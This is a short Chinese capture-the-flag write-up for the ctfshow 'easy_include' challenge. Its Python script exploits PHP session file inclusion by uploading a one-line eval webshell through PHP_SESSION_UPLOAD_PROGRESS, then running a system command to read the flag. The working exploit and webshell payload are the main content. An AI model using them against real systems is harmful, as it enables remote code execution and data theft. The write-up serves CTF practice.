【CTFshow】元旦水友赛easy_include_ctfshow元旦水友赛

作者：人工智能uu | 2024-07-10 21:04:26

踩

ctfshow元旦水友赛

不能有 ‘.’ 并且首字母要小写英文

抓包发现cookie已经有phpsessid，说明可以有session文件包含。

（php会将session以文件的形式储存）

脚本见ctfshow元旦，easy_include_ctfshow easy_include-CSDN博客

import requests

url = "http://35a34248-be86-4463-95dc-5a5a9fd16e39.challenge.ctf.show/"

data = {
    'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[2]);?>',#一句话木马
    '1': 'localhost/tmp/sess_ctfshow',#php session以文件形式存储的默认路径，session文件默认命名方式是sess_<PHPSESSID>
    '2': 'system("cat /f*");'#一句话木马的执行内容
}

file = {
    'file': 'ctfshow'
}
cookies = {
    'PHPSESSID': 'ctfshow'
}

response = requests.post(url=url, data=data, files=file, cookies=cookies)
print(response.text)

运行脚本取得flag

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/人工智能uu/article/detail/807693